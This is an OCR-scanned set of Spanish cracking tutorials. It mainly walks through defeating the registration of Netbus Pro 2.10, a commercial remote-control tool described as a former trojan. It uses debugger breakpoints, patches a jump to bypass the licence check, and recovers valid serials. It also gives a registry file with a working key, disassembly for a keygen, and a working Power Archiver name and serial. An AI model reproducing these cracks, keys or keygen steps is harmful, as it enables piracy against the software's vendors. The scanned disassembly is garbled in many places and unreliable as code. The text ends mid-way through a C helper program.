Mr. Crimson. ( http://www.multimania.com/mrcrimson/private/MrCrimson!l.zip). Tengo una gran deuda contraida 
con él y también con JoTaKe. 


Ahora sólo queda la comprobación. En este programa es fácil, basta con poner en el Slce un bpx 40403D y en la 
dirección de EDI se puede ver el número correcto. Ahora sólo es cuestión de probar con los nombres más 
inverosímiles, y ver si el resultado coincide :0) 


(2 Power Archiver 7.0 PA ES | 


Nombre | CaoS ReptantE 
Serial 23D29BEB 


Terminar | 


Ya sólo me queda recordaros que si vais a utilizar regularmente el programa, debéis pagar por él. Pensad que un día, 
vuestros hijos os pueden preguntar si vosotros erais de aquella gente que no pagaba por sus programas, y entonces 
diréis: "¿QUIÉN, YOOO?". Que vergiienza... 30) 


Para finalizar, quiero enviar un saludo a mis amigos Act Mago y DeK_OIiN. Saludos también a Karpoff, 
agradeciéndole sus palabras de aliento y en general, a todos los que comparten sus conocimientos con los demás :0) 


Para consultas relativas a mis tutos, mi dirección de e-mail es: caos_reptante O hotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 


Programa: Netbus Pro v2.10 

PROTECCION: Serial. 

Objetivo: Crack / Loader / Serial / Keygen 

Descripcion: Version Comercial del famoso Troyano 

Dificultad: Aficionado 

DOWNLOAD: http://go.to./mr_burns 

Herramientas: Softice, Languaje2000, ProcDump, IceDump, Win32DAsm, Tasm v5.0 

CRACKER: Mr.Burns FECHA: 13/08/2001 
INTRODUCCION 


Hola de nuevo a todos. Despues de una gran demora he vuelto con fuerza!!! jejeje Despues de un par de dias de duro trabajo y 
alguna ke otra noche sin dormir he decidido culminar mi trabajo con el Netbus con un tutorial, mas que nada para recordar viejos 
tiempos ;) 


Espero que disfruten y aprendan de este tuto tanto como yo. He de pedir disculpas por el excesivo tamaño del tutorial (para que 
luego digan que el saber no ocupa lugar jeje), pero he intentado detallar lo mas posible para realizar un "buen" estudio del 
programa.... Bueno... creo que el magnifico tiempo acompaña (al igual que la cervezita y el cigarrito de rigor) asi que creo que 
deberiamos empezar con lo nuestro, no? 


PUes...... AL ATAQUE! 


AL ATAKE 


El objetivo de este tutorial es, lo que yo llamo, un completo: CRaCK, SeRiaL €: KeYgEn. Empezamos recopilando algo de 
informacion sobre el programa con el que vamos a "jugar", para saber en que lenguaje ha sido escrito yo suelo usar el 
Languaje2000, con el que podremos saber que esta hecho en Pascal (si sus entrañas fueran Visual Basic, este tutorial no 
existiria ;)) Tambien usaremos el ProcDump para averiguar si sus secciones son "ejecutables y modificables", una vez dentro 
podemos observar que hay 8 secciones (.CODE, .DATA, .BBS, .idata, .tls, .rdata, .reloc, .rsrc) y que la seccion .CODE tiene un 
valor 60000020 el cual cambiaremos rapidamente a E0000020, para poder modificar el codigo a nuestro gusto xD. Despues 
corremos el programa, vemos como funciona y nos damos cuenta que es no nos gusta, al menos a mi, y todo ello porque es 
una version comercial por la que debemos PAGAR!!! cuando hace nada era un peligroso troyano!!! =( Bueno, creo que 


deberiamos remediar esto. Vayamos al menu Help/Register, e introducimos nuestros datos: 
Your Name: Mr. Burns 
Company: Hispano Crackers 


Key: 1234567890 


--- Objetivo 1: CRaCK --- 


Una vez introducidos los datos, entramos en el SiCe (asi llamaremos al Softl ce) con Control + D, y situamos los tipicos bpx: 


bpx GetWindowTextA y bpx GetDlgltemTextA. Salimos de nuevo del SiCe (Control + D) y presionamos el boton Register, y.... 
no pasa nada!!!? Vaya que raro, pues habra que probar con nuestro bpx comodin: bpx hmemcpy a ver que pasa... Asi que 
volvemos a realizar la misma operacion, y una vez dentro de SICE os recomiendo quitar el bpx (bc *) para que no nos 
moleste en nuestra travesia por el codigo. Como siempre, hemos de tracear incontables veces hasta entrar en el codigo del 
programa, en este caso, entraremos en la seccion de ,CODE (Netbus!CODE+XxXxXxXx). Una vez dentro del programa, hemos 
de pasar por 7 RETSs hasta llegar al punto deseado: el lugar donde se recoge el nombre, y este punto esta en la direccion 
4E£0C87. Aqui podremos encontrar algo tal que asi: 


:004FE0C87 8B45F4 mov eax, dword ptr [ebp-0C] <--- EAX = Nombre 
:004E0C8A 50 push eax 


* Possible StringData Ref from Code Obj ->"Name" 


| 
:004E£0C8B B9680D4E00 mov ecx, 004E0D68 


* Possible StringData Ref from Code Obj ->"License" 


| 

:004E0C90 BA780D4E00 mov edx, 004£0D78 

:004E0C95 8B45F8 mov eax, dword ptr [ebp-08] 

:004£0C98 ESAB81F9FF call 00478E48 <--- Introduce el nombre en el registro (ya lo veremos mas adelante) 
:004E0C9D 8D55F4 lea edx, dword ptr [ebp-0C] 

:004EOCAO 8B45FC mov eax, dword ptr [ebp-04] 

:004E0CA3 8B80DC020000 mov eax, dword ptr [eax+-000002DC] 

:004EOCA9 E8D224F5FF call 00433180 

:004EOCAE 8B45F4 mov eax, dword ptr [ebp-0C] <--- EAX = Nuestro Numero de Serie 

:004FE0CB1 50 push eax 


* Possible StringData Ref from Code Obj ->"Key" 


| 
:004E0CB2 B9880D4E00 mov ecx, 004E0D88 


* Possible StringData Ref from Code Obj ->"License" 


| 

:004E0CB7 BA780D4E00 mov edx, 004E0D78 

:004E0CBC 8B45F8 mov eax, dword ptr [ebp-08] 

:004EOCBF E88481F9FF call 00478E48 <--- Introduce el numero de serie en el registro 
:004E0CC4 8D55F4 lea edx, dword ptr [ebp-0C] 

:004E0CC7 8B45FC mov eax, dword ptr [ebp-04] 

:004EOCCA 8B80D8020000 mov eax, dword ptr [eax+-000002D8] 

:004E0CDO ESAB24F5FF call 00433180 

:004E0CD5 8B45F4 mov eax, dword ptr [ebp-0C] <--- EAX = Compañia 

:004E0CD8 50 push eax 


* Possible StringData Ref from Code Obj ->"Company" 


| 
:004E0CD9 B9940D4E00 mov ecx, 004E0D94 


* Possible StringData Ref from Code Obj ->"License" 
| 


:004EO0CDE BA780D4E00 mov edx, 004E0D78 

:004E0CE3 8B45F8 mov eex, dword ptr [ebp-08] 

:004E0CE6 E85D81F9FF call 00478E48 <--- Introduce la compañia en el registro 
:004EO0CEB 33C0 xor eax, eax 

:004EOCED 5A pop edx 

:004EOCEE 59 pop ecx 

:004EOCEF 59 pop ecx 

:004E0CFO 648910 mov dword ptr fs:[eax], edx 

:004E0CF3 68080D4E00 push 004E£0DO8 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|: 004E0DO6(U) 


| 

:004E0CF8 8B45F8 mov eax, dword ptr [ebp-08] 
:004E0CFB E86023F2FF call 00403060 

:004E0D00 C3 ret <--- Nos lleva a la direccion 4E0D08 


:O04E0DO1 E9062AF2FF ¡mp 0040370C 
:004£0D06 EBFO ¡mp 004E0CF8 


:004E0D08 ES6F54FFFF call 004D617C <--- Aqui dentro se generan los serials correctos 
:004E0DOD 84CO0 test al, al 


:004E0DOF 7414 je 004E0D25 <--- si nuestro serial ha sido correcto no saltamos 
:004£0D11 B940000000 mov ecx, 00000040 


* Possible StringData Ref from Code Obj ->"Thanks" 


:004E0D16 BAA40D4E00 mov edx, 004E0DA4 <--- EDX = Titulo del ventanuco 


* Possible StringData Ref from Code Obj ->"Thanks for registering NetBus " 
->"Pro and supporting Shareware software." 


| 
:004F0D1B B8B40D4E00 mov eax, 004E0DB4 <--- EAX = Mensaje del ventanuco 
:004E0D20 E8736F0000 call 004E7C98 <--- Crea el ventanuco... 


Despues de ver esto, lo 12 que se nos ocurre es cambiar ese J E en la direccion 4E0DOF por un JNE o por un par de NOPs 
para que siempre nos salga, el ventanuco; podeis intentarlo pero seguiremos en las mismas, es decir, sin estar registrados 
porque nos seguira saliendo esa fea publicidad y un cuadro de inicio tan feo como este 


NeiBus Pro 


“version 2.10 


Please register this software if you like it and have 
use of it 


Una vez hecho esto, lo que vamos a hacer es desensamblar el programa con el Win32DAsm (tardara un rato asi que podeis 
iros a por otra cervezita ;)) BIEN!! ahora nos vamos a la direccion donde se llama a la rutina que genera los serials, la 


direccion 4D617C (:004E0DO8 E86F54FFFF call 004D617C) y podemos ver que hay varias llamadas esta direccion, ademas de 
un salto: 


* Referenced by a CALL at Addresses: 
|:004D6363 , :004D958C , :004E0DO8 , :004E5448 , :004E5E81 
|:004FO63D , :004FOB86 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


|:004D617A(C) 


| 
:004D617C 55 push ebp 
:004D617D 8BEC mov ebp, esp 


Ahora vamos a apuntar esas CALL s y cargamos el Loader del SICE, ponemos los BPX en esas direcciones y le damos al F5 
para ver que que llamada es la que comprueba que el serial que habiamos introducido es correcto para eliminar la publicidad 
y sacarnos esta ventana tan bonita: 


NeiBus Pro 


“version 2.10 


This product is licensed to: 


Mr. Bumns 
Hispano Crackers 


Al instante de haber apretado F5, el SICE nos llevara a la direccion 4D6363: 
:004D6363 ES14FEFFFF call 004D617C 
:004D6368 84CO0 test al, al 


:004D636A 7426 je 004D6392 


Lo unico que debemos hacer es cambiar ese JE de la direccion 4D636A por un J NE o, mejor, por un par de NOPs. Una vez 


Siento no detenerme mas detenidamente en esta parte, pero mi objetivo principal es el keygen (ese si que va a ser bonito de 
verdad) y, sinceramente, saltarse la proteccion de este programa es basico. Asi que pasemos a la obtencion del serial... 


--- Objetivo 2: SeRiaL --- 


En este apartado nos dedicaremos a hallar los dos serials que el programa admite como validos para el registro. Asi que. . 
vamos a ello!!! Tenemos una ventaja, ya sabemos la direccion donde se generan los serials (4D617C), porque ya lo hemos 
hallado antes. Asi que entramos de nuevo en el SICE, esta vez con el Loader, para evitar problemas de cuelgues, y ponemos 
un bpx en esa direccion: bpx 4D617C. Le damos al F5 e instantaneamente el SICE parará ya que esta en la comprobacion 
que nos saltamos antes (la de la llamada 4D6363). A partir de ahora tendremos que ir traceando poco a poco y con atencion, 
cualquier llamada puede ser la que nos proporcione nuestros serials. Despues de tracear un poquito, vemos que en la 
direccion 4D61D6 se empieza a "manejar" nuestro serial (1234567890), asi que a partir de ahi, habra que ir con extrema 
atencion. Analicemos el codigo: 


:004D61D6 8B4DFO mov ecx, dword ptr [ebp-10] <--- ECX = Nuestro Serial 

:004D61D9 BA84624D00 mov edx, 004D6284 <--- EDX = $ 

:004D61DE E8SD1DDF2FF call 00403FB4 <--- Inserta al principio de nuestro serial $ 
:004D61E3 8B95E8FEFFFF mov edx, dword ptr [ebp+FFFFFEE8] <--- EDX = $ + Nuestro serial 
:004D61E9 8D85ECFEFFFF lea eax, dword ptr [ebp+FFFFFEEC] 

:004D61EF B9FFO00000 mov ecx, OOOOOOFF 


:004D61F4 E84BDDF2FF call 00403F44 <--- Ahora inserta al principo la longitud de EDX 

:004D61F9 8D85ECFEFFFF lea eax, dword ptr [ebp+FFFFFEEC] <--- EAX = Serial Long + $ + Nuestro Serial 
:004D61FF 50 push eax <--- Lo guarda 

:004D6200 8D85E8FDFFFF lea eax, dword ptr [ebp+FFFFFDE8] 

:004D6206 8B55EC mov edx, dword ptr [ebp-14] <--- EDX = Nuestro Nombre 

:004D6209 B9FFO00000 mov ecx, OODOOOFF 

:004D620E E831DDF2FF call 00403F44 <--- Inserta al principio la longitud de nuestro nombre 

:004D6213 8D95E8FDFFFF lea edx, dword ptr [ebp+FFFFFDE8] <--- EDX = Name Long + Nuestro Nombre 
:004D6219 8B45F8 mov eax, dword ptr [ebp-08] 

:004D621C 59 pop ecx 


:004D6222 85C0 test eax, eax 


En la direccion 4D621D es donde se generan nuestros serials. Asi que, vamos a entrar a ver que nos encontramos: 


:004D5464 53 push ebx 

:004D5A65 56 push esi 

:004D5A66 57 push edi 

:004D5A67 83C4C0 add esp, FFFFFFCO 

:004D5A6A 8BF1 mov esi, ecx 

:004D5A6C 8D3C24 lea edi, dword ptr [esp] 

:004D5A6F 33C9 xor ecx, ecx 

:004D5A71 8A0E mov cl, byte ptr [esi] <---CL = Longitud del $ + Serial 
:004D5A73 80F909 cmp cl, 09 

:004D5A76 7202 jb 004D5A7A <--- Si es menor => ERROR!!! 
:004D5A78 B109 mov cl, 09 <--- CL = 9 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D5A76(C) 


| 

:004D5A7A 880F mov byte ptr [edil], cl 

:004D5A7C 46 inc esi 

:004D5A7D 47 inc edi 

:004D5A7E F3 repz 

:004D5A7F A4 movsb <--- Desplaza a EDI los 9 primeros caracteres del serial, incluido el $ (vamos, que lo recorta si es 
mayor de 9) 

:004D5A80 8BF2 mov esi, edx 

:004D5A82 8D7C240A lea edi, dword ptr [esp+0A] 

:004D5A86 33C9 xor ecx, ecx 

:004D5A88 8A0E mov cl, byte ptr [esi] <--- CL = Longitud del nombre 
:004D5A8A 80F932 cmp cl, 32 

:004D5A8D 7202 jb 004D5A91 <--- Comprueba que sea menor que 32h 
:004D5A8F B132 mov cl, 32 <--- CL = 32h 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D5A8D(C) 


| 

:004D5A91 880F mov byte ptr [edi], cl 

:004D5A93 46 inc esi 

:004D5A94 47 inc edi 

:004D5A95 F3 repz 

:004D5A96 A4 movsb <--- Desplaza a EDI el nombre (si es mayor de 32h, lo recorta) 
:004D5A97 8BD8 mov ebx, eax 

:004D5A99 33D2 xor edx, edx 

:004D5A9B 8A54240A mov dl, byte ptr [esp+0A] <--- DL = Longitud del nombre 
:004D5A9F 42 inc edx 

:004D5AAO 83FA32 cmp edx, 00000032 

:004D5AA3 7FOE jg 004D5AB3 <--- Comprueba si el nombre es menor a 32h 
:004D5AA5 8D44140A lea eax, dword ptr [esp+edx+0A] <--- EAX = Apunta al final de la cadena 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D5AB1(C) 


:004D5AA9 C6002A mov byte ptr [eax], 2A <--- En este bucle, rellena de * el final del nombre hasta 33h 
:004D5AAC 42 inc edx 


:004D5AAD 40 inc eax 
:004D5AAE 83FA33 cmp edx, 00000033 


:004D5AB1 75F6 ¡ne OO04D5AA9 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D5AA3(C) 


:004D5AB3 8BCC mov ecx, esp <--- ECX = Long Serial + $ + Nuestro Serial + Long Name + Nuestro Nombre + ****(hasta 
33h) 

:004D5AB5 8D54240A lea edx, dword ptr [esp+0A] <--- EDX = Apunta al nombre 

:004D5AB9 8BC3 mov eax, ebx 


Despues de analizar el codigo, al pasar la direccion 4D5ABB y poniendo d edx, podemos observar que tenemos un numero 
que nosotros no habiamos introducido y ke ha aparecido de "la nada". Asi que, hmm, habra que entrar en esta llamada a ver 
que nos "cuenta". He de comentar que las operaciones que realiza entre las direcciones 4D59BC hasta 4D59ED es lo mismo 
que hemos visto antes: junta nuestro serial con el nombre y blabla blablabla (me he expresado con claridad?? xDD). Veamos 
que hay despues de eso: 


:004D59EF 8BFO mov esi, eax 

:004D59F1 33DB xor ebx, ebx 

:004D59F3 889E75030000 mov byte ptr [esi+00000375], bl 

:004D59F9 8D442440 lea eax, dword ptr [esp+40] 

:004D59FD 50 push eax 

:004D59FE 8BCB mov ecx, ebx 

:004D5A00 8D54240E lea edx, dword ptr [esp+0E] <--- EDX = Long Name + Nuestro Nombre 
:004D5A04 8BC6 mov eax, esi 


:004D5A0B 8D442440 lea eax, dword ptr [esp+40] <--- EAX = Long Serial + $ + 12 Serial valido 
:004D5AOF 8BD4 mov edx, esp 

:004D5A11 33C9 xor ecx, ecx 

:004D5A13 8A08 mov cl, byte ptr [eax] 

:004D5A15 41 inc ecx 

:004D5A16 E811D2F2FF call 00402C2C 

:004D5A1B 0OF94CO0 sete al 

:004D5A1E 84C0 test al, al 

:004D5A20 7538 ¡ne 004D5A5A 

:004D5A22 B301 mov bl, 01 

:004D5A24 889E75030000 mov byte ptr [esi+-000003751, bl 

:004D5A2A 8D442440 lea eax, dword ptr [esp+40] 

:004D5A2E 50 push eax 

:004D5A2F 8BCB mov ecx, ebx 

:004D5A31 8D54240E lea edx, dword ptr [esp+0E] <--- EDX = Long Name + Nuestro Nombre 
:004D5A35 8BC6 mov eax, esi 


:004D5A3C 8D442440 lea eax, dword ptr [esp+40] <--- EAX = Long Serial + $ + 22 Serial valido 


Bien, como podeis comprobar hay dos llamadas diferentes para generas nuestros serials: 12 serial en la direccion 4D5A06 y el 
22 serial en 4D5A37. Para poder ver esos serials, debeis pasar la llamada y poner d eax (en ambos casos). Para comprobar si 
esos serials son los correcots, tendremos que salir de SICE, no sin antes quitar todos los bpx con bc *, ejecutar el netbus.exe 
y probar los serials con el nombre correspondiente. No hace falta que os diga, que esos serials son los correctos, no? ;-) 


He de mencionar que no tengo ni la mas remota idea de porque el programador se ha molestado en realizar todas esas 
operaciones con el nuestro serial (1234567890) y el nombre, ya que, como vereis mas adelante, no lo usa para nada. 


Me gustaria añadir otra cosa mas. Una vez obtenidos los serials, por si recordais en el "primer objetivo” vimos que el 
programa comprueba en el registro si los datos son correctos. Por ello, tenemos otra posibilidad en vez de crack: podemos 
crear un archivo que nos introduzca en el registro de windows nuestros datos con uno de los dos serials correctos obtenidos 
anteriormente para tener registrado "oficialmente y sin trampas el programa" xDDD . El programa que yo edite es tal que asi: 


REGEDIT4 


[HKEY_CURRENT_USERNetBua License] 
"Company" = "Hispano Crackers" 

"Key" = "66D6654A" 

"Name" = "Mr. Burns" 


De esta manera teneis una forma mas elegante de registrarlo con vuestros datos. Tras esto.. creo que deberiamos ir a por 


--- Objetivo FiNaL: KeYgEn --- 


Al igual que antes, ahora tenemos una ventaja: sabemos las direcciones donde se generan los dos serials posibles. Esto nos 
rebajara muchisimo el trabajo, aunque tenemos mucho por hacer. Empezaremos entrando en la CALL de la direccion 4D5ABB 
que es donde se generan los dos serials (no voy a especificar mas, para eso ya he implementado el codigo de las operaciones 
que se realizan). Dentro de esa llamada tenemos las otras dos llamadas que mas nos interesan: 4D5A06 y 4D5A37. De 
momento nos vamos a centrar en la primera, y una vez comprendido el codigo, pasaremos a la segunda (aunque la 
diferencia es minima). Ahora entremos en la primera llamada y vemos que tiene en sus entrañas: 


* Referenced by a CALL at Addresses: 
|:004D5A06 , :004D5A37 <--- Podemos darnos cuenta que este codigo genera dos dos serials, no? 


:004D5810 55 push ebp <--- Desde aqui hasta la direccion 4D5832, lo que hace es mover Long Name + Nuestro Nombre a 
"otro lugar" 


:004D5811 8BEC mov ebp, esp 

:004D5813 81C46CFFFFFF add esp, FFFFFF6C 
:004D5819 53 push ebx 

:004D581A 56 push esi 

:004D5818B 57 push edi 

:004D581C 8BF2 mov esi, edx 

:004D581E 8D7DC2 lea edi, dword ptr [ebp-3E] 
:004D5821 51 push ecx 

:004D5822 33C9 xor ecx, ecx 

:004D5824 8A0E mov cl, byte ptr [esi] 
:004D5826 80F932 cmp cl, 32 

:004D5829 7202 jb 004D582D 

:004D582B B132 mov cl, 32 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D5829(C) 


| 

:004D582D 880F mov byte ptr [edi], cl 
:004D582F 46 inc esi 

:004D5830 47 inc edi 

:004D5831 F3 repz 

:004D5832 A4 movsb 

:004D5833 59 pop ecx 

:004D5834 884DFF mov byte ptr [ebp-01], cl 
:004D5837 8BD8 mov ebx, eax 

:004D5839 33C0 xor eax, eax 

:004D583B 8A45C2 mov al, byte ptr [ebp-3E] 
:004D583E 40 inc eax 

:004D583F 83F832 cmp eax, 00000032 
:004D5842 7FOE jg 004D5852 

:004D5844 8D5405C2 lea edx, dword ptr [ebp+eax-3E] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D5850(C) 


:004D5848 C6022A mov byte ptr [edx], 2A <--- En este bucle rellena hasta 33h de " * " 
:004D584B 40 inc eax 


:004D584C 42 inc edx 


:004D584D 83F833 cmp eax, 00000033 
:004D5850 75F6 jne 004D5848 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D5842(C) 


| 

:004D5852 8D8D6CFFFFFF lea ecx, dword ptr [ebp+FFFFFF6C] 

:004D5858 8B9324020000 mov edx, dword ptr [ebx+-00000224] 

:004D585E 8BC3 mov eax, ebx 

:004D5860 E853FEFFFF call 004D56B8 <--- Genera un numero esencial para el keygen (116ADFA4) que lo llamaremos Num1 
:004D5865 8D956CFFFFFF lea edx, dword ptr [ebp+FFFFFF6C] <--- EDX = Ese mismo numero 
:004D586B 8D45F5 lea eax, dword ptr [ebp-0B] 

:004D586E B109 mov cl, 09 

:004D5870 ES03D3F2FF call 00402B78 <--- Desplaza Numl 

:004D5875 B80A000000 mov eax, OOO0000A 

:004D587A 8D55F5 lea edx, dword ptr [ebp-0B] 

:004D587D 8DB57BFFFFFF lea esi, dword ptr [ebp+FFFFFF7B] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D588A(C) 


:004D5883 8A0A mov cl, byte ptr [edx] <--- En este bucle se mueve Long Name + Nuestro Nombre (con los *) 


:004D5885 880E mov byte ptr [esi], cl <--- De esta manera tenemos Long Numl + $ + Num1l + Long Name + Nuestro 
Nombre 


:004D5887 46 inc esi 

:004D5888 42 inc edx 

:004D5889 48 dec eax 

:004D588A 75F7 jne 004D5883 

:004D588C B833000000 mov eax, 00000033 
:004D5891 8D55C2 lea edx, dword ptr [ebp-3E] 
:004D5894 8D7585 lea esi, dword ptr [ebp-7B] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D589E(C) 


:004D5897 8A0A mov cl, byte ptr [edx] 

:004D5899 880E mov byte ptr [esil, cl 

:004D589B 46 inc esi 

:004D589C 42 inc edx 

:004D589D 48 dec eax 

:004D589E 75F7 ¡ne 004D5897 

:004D58A0 8D8D6CFFFFFF lea ecx, dword ptr [ebp+FFFFFF6C] 

:004D58A6 8B9328020000 mov edx, dword ptr [ebx+00000228] 

:004D58AC 8BC3 mov eax, ebx 

:004D58AE ESO5FEFFFF call 004D56B8 <--- Genera otro numero esencial (201AF3D7) que llamaremos Num2 
:004D58B3 8D956CFFFFFF lea edx, dword ptr [ebp+FFFFFF6C] 

:004D58B9 8D45F5 lea eax, dword ptr [ebp-0B] 

:004D58BC B109 mov cl, 09 

:004D58BE E8B5D2F2FF call 00402B78 <--- Desplaza Num2 y comprueba si hemos de modificar Num2 
:004D58C3 807DFFOO cmp byte ptr [ebp-01], 00 

:004D58C7 7417 je 004D58E0 <--- Si hemos de modificar Num2, no saltamos 

:004D58C9 B80A000000 mov eax, 0000000A 

:004D58CE 8D55F5 lea edx, dword ptr [ebp-0B] 

:004D58D1 8D75B8 lea esi, dword ptr [ebp-48] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D58DC(C) 


:004D58D4 8A0A mov cl, byte ptr [edx] <--- Este bucle tan solo decrementa cada uno de los elementos de Num2 con el que 
se genera el segundo serial valido 

:004D58D6 49 dec ecx 

:004D58D7 880E mov byte ptr [esil, cl 

:004D58D09 46 inc esi 

:004D58DA 42 inc edx 

:004D58DB 48 dec eax 


:004D58DC 75F6 jne 004D58D4 <--- Despues de bucle tenemos +41/00E2C6 que llamaremos Num3 
:004D58DE EB14 jmp 004D58F4 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D58C7(C) 


| 

:004D58E0 B80A000000 mov eax, 0000000A 
:004D58E5 8D55F5 lea edx, dword ptr [ebp-0B] 
:004D58E8 8D75B8 lea esi, dword ptr [ebp-48] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D58F2(C) 


:004D58EB 8A0A mov cl, byte ptr [edx] <--- Este bucle desplaza Num2 o Num3, segun sea el caso 
:004D58ED 880E mov byte ptr [esil, cl 

:004D58EF 46 inc esi 

:004D58F0 42 inc edx 

:004D58F1 48 dec eax 

:004D58F2 75F7 ¡ne 004D58EB 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D58DE(U) 
| 


:004D58F4 8B9334030000 mov edx, dword ptr [ebx+00000334] 

:004D58FA 8D8D7BFFFFFF lea ecx, dword ptr [ebp+FFFFFF7B] <--- Temenos: Long Numl + $ + Numl + Long Name + 
Nombre + Long Num2 + $ + Num2 + Long Name + Nombre 

:004D5900 8BC3 mov eax, ebx 

:004D5902 ES69FDFFFF call 004D5670 <--- Realiza las operaciones que generan nuestros serials!!! 
:004D5907 8BDO mov edx, eax 

:004D5909 8D8D6CFFFFFF lea ecx, dword ptr [ebp+FFFFFF6C] 

:004D590F 8BC3 mov eax, ebx 

:004D5911 E8A2FDFFFF call 004D56B8 

:004D5916 8D956CFFFFFF lea edx, dword ptr [ebp+FFFFFF6C] <--- EDX = Serial Correcto!!!! 
:004D591C 8B4508 mov eax, dword ptr [ebp+08] 

:004D591F B109 mov cl, 09 

:004D5921 E852D2F2FF call 00402B78 

:004D5926 5F pop edi 

:004D5927 5E pop esi 

:004D5928 5B pop ebx 

:004D5929 8BE5 mov esp, ebp 

:004D592B 5D pop ebp 

:004D592C C20400 ret 0004 


Antes de nada comentar que todo este "churro" de instrucciones generan los dos serials, la unica diferencia se encuentra 
(como he comentado en el codigo) en la llamada 4D58BE y en el bucle 4D58D4 - 4D58DC. No quiero comentar las llamadas 
que generan Num1, Num2 y Num3 porque tan solo son constantes y este tutorial tiene un tamaño excesivo, pero si quereis 
os lo dejo como ejercicio xDDD. Bien tan solo nos queda entrar en la llamada de la direccion 4D5902 y ver que operaciones 
realiza con ese cadena tan larga que teniamos con Numl, Num2 el nombre y demas. Pero antes quiero hacer un simple 
resumen de lo que hemos visto aqui para los que se han perdido; todo el codigo de antes lo unico que hace es: 


- Genera la constante Num1 (Long Numl1 + $ + 116ADFA4) en la direccion 4D5860 


- Junta Numl y el Nombre obteniendo (Cadena1): Long Numl1 + $ + Num1 + Long Name + Nombre (relleno 
de " * " hasta 33h) 


- Genera la constante Num2 (Long Numl1 + $ + 201AF3D7) en la direccion 4D58AE 


- Comprueba si ya ha realizado el serial con ese numero, si es asi, modifica Num2 para darnos Num3 


decrementando cada uno de sus elementos ( Long Num3 + $ + ++1/00E2C6) en la direccion 4D58BE hasta 
A4D58DC. 


- Junta Cadenal con Long Num2 (o Num3) + $ + Num2 (o 3) + Long Name + Nombre (relleno de " * *) 


Espero que con esto os hayais aclarado. Ahora vamosa entrar en la llamada de la direccion 4D5902 a ver que hace con esa 
cadena: 


* Referenced by a CALL at Addresses: 
|:004D5902 , :004D5967 , :004D59AC 


| 

:004D5670 53 push ebx 

:004D5671 56 push esi 

:004D5672 57 push edi 

:004D5673 83C4B8 add esp, FFFFFFB8 

:004D5676 8BF1 mov esi, ecx 

:004D5678 8D3C24 lea edi, dword ptr [esp] 

:004D567B B911000000 mov ecx, 00000011 

:004D5680 F3 repz 

:004D5681 A5 movsd 

:004D5682 66A5 movsw 

:004D5684 A4 movsb <--- Hasta aqui, lo unico que ha hecho es mover Long Numl + $ + Num1 + Long Name + Nombre + 
Long Num2 (o 3) + $ + Num (0 3) 

:004D5685 B147 mov cl, 47 <--- CL = 47h = Longitud de la cadena que acaba de desplazar 
:004D5687 8BC4 mov eax, esp <--- EAX apunta al principio de esa cadena 


* Referenced by a (U)nconditional or (C)onditional J ump at Address: <--- Comenzamos el bucle final 
|: 004D56AD(C) 


| 

:004D5689 8BDA mov ebx, edx <--- Al principio EBX = OOABCDEFh 

:004D568B C1EBO8 shr ebx, 08 <--- EBX = cuatro primeros 

:004D568E 81E3FFFFFFOO and ebx, OOFFFFFF <--- Lo "filtra" 

:004D5694 0FB630 movzx esi, byte ptr [eax] <--- ESI = Elemento de la cadena 

:004D5697 33D6 xor edx, esi <--- EDX xor ESI 

:004D5699 81E2FF000000 and edx, OOOOOOFF <--- EDX = Los dos ultimos elementos 

:004D569F 8B14958C414F00 mov edx, dword ptr [4*edx+004F418C] <--- Lo mas importante, lo comentamos ahora... 
:004D56A6 33DA xor ebx, edx <--- EBX xor EDX 

:004D56A8 8BD3 mov edx, ebx <--- EDX = EBX 

:004D56AA 40 inc eax <--- EAX apunta al siguiente elemento de la cadena 

:004D56AB FEC9 dec cl <--- CL = CL - 1 

:004D56AD 75DA ¡ne 004D5689 <--- No para hasta realizar las operaciones con todos los elementos de la cadena 
:004D56AF 8BC2 mov eax, edx <--- EAX = Serial correcto 

:004D56B1 830448 add esp, 00000048 

:004D56B4 5F pop edi 

:004D56B5 5E pop esi 

:004D56B6 5B pop ebx 

:004D56B7 C3 ret 


Las operaciones que tenemos aqui no tienen especial complicacion, lo unico que quiero es destacar la direccion 4D569F; ahi 
lo que hace es recoger una palabra en la posicion que indique EDX * 4 de una tabla que debemos recoger. Hemos de tener 
en cuenta dos cosas: 12 Al tener anteriormente una and edx, OFFh hemos de tener en cuenta que EDX no sera mayor de FFh 
asi que su rango sera de OO0h a FFh; y 22 tenemos de multiplicar ese valor por 4. Asi que para poder determinar el principio 
de la tabla seria 00 * 4 + 4F418C = 4F418C y el final sera FF * 4 + 4F418C = 4F458C, es decir, que la tabla tiene un tamaño 
de 400h = 1024d bytes. Esta tabla no os la pongo porque, no me da la gana xDD Para ello yo use el |ceDump: /dump 
4F418C 400 C:INetbus210_Tabla.txt, con este comando tendreis la tabla que necesitais para crear el keygen, pero he de 
avisar que hay un fallo (aunque no se si os pasara a todos), el IceDump sustituye los "00h" por "20h", esto me volvio loco 
hasta que lo descubri, asi que estais avisados. 


Despues de todo esto ya tenemos la informacion necesaria para crear el keygen, el cual va a ser en ASM como es tradional 
xDD, Como la tabla tan solo eran numeros y debia añadirles, para que "funcionaran" en asm, una serie de elementos decidi 
hacer un programa simple en C, para evitar tener que añadir "h, " a 1024 elementos!!! y que me transformara 2000AFE1 
(que obtuve con el |ceDump) en db 020h, O00h, OAFh, OE1h (lo que entiende Tasm). Aqui os pongo el codigo: 


/FReconstructor v0.1 CoDeD bY Mr. Burns*/ 


/*CReaTeD WiTH TuRBo C*/ 


Ftinclude <stdio.h> 


void main() 


1 

